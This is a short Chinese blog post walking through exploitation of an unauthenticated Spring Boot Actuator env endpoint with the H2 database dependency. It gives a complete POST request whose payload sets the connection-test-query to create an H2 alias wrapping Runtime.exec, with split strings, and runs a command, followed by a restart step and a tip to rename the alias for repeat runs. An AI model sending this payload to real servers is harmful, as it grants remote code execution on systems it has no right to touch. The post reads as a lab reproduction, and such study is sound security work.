zoukankan      html  css  js  c++  java
  • Spring未授权REC利用方式四(env接口/h2 database query RCE)

    一、漏洞成因

      env接口暴露

      使用h2 database 依赖

    二、利用条件

      env接口

      restart接口

      存在 com.h2database.h2 依赖

    三、漏洞确认

      访问env接口,查看是否存在h2 database相关依赖

      

     四、漏洞复现

      1. 访问env接口post传参,记得添加content-type

    POST /actuator/env
    Content-Type: application/json

    {"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

      

       2.我这里改成了画画板,访问env查看是否写入

      

      3.restart重启

      

       总结:

       1.这个利用过程比较简单,就是在发送post请求的时候,里面value值的在执行一次后换一个T5,如下换T6,原参考文章中有提到,否则执行失败。

       2.h2 database还有Jndi注入的注入方式就不尝试复现了

       3.mysql的有点复杂,暂时不尝试了,spring未授权的rec漏洞复现暂时到此为止了。

    参考文章:

      https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce

  • 相关阅读:
    【Android
    【数据结构】之链表(C语言描述)
    【数据结构】之顺序表(C语言描述)
    【Android
    【Android
    【Android
    【Android
    【Android
    在线HTTP速度测试(响应时间测试)及浏览器兼容测试
    阿里云 腾讯云 服务器挂载数据盘
  • 原文地址:https://www.cnblogs.com/hei-zi/p/14345335.html
Copyright © 2011-2022 走看看